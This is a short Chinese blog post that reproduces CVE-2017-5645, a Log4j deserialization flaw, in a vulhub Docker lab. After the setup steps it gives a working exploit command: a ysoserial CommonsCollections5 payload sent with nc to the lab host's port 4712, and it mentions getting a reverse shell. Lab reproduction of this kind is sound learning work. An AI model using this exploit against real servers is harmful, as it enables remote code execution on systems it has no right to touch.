log4j复现之CVE-2017-5645
2023-07-17 18:23:26 109浏览
由于网络原因,直接到官网去下,得到的压缩文件,然后对其解压即可。可以看得到已成功执行。反弹shell也能回来。
log4j复现之CVE-2017-5645
一、靶机环境的安装
1.docker环境安装
apt-get update
apt-get install -y apt-transport-https ca-certificates
apt install docker.io
apt-get install python3-pip
pip3 install docker-compose
docker-compose -v
2.下载vlnhub
git clone https://gitee.com/puier/vulhub.git
由于网络原因,直接到官网去下,得到的压缩文件,然后对其解压即可。
二、编译启动靶机
对靶场进行编译:docker-compose build
运行靶场:docker-compose up -d
三、漏洞利用
1.到官网下载ysoserial-all.jar
文件
java -jar ysoserial-all.jar CommonsCollections5 "touch /tmp/success" | nc 192.168.6.133 4712
2.注意运行的Java环境是1.7
好博客就要一起分享哦!分享海报
此处可发布评论
评论(0)展开评论
暂无评论,快来写一下吧
展开评论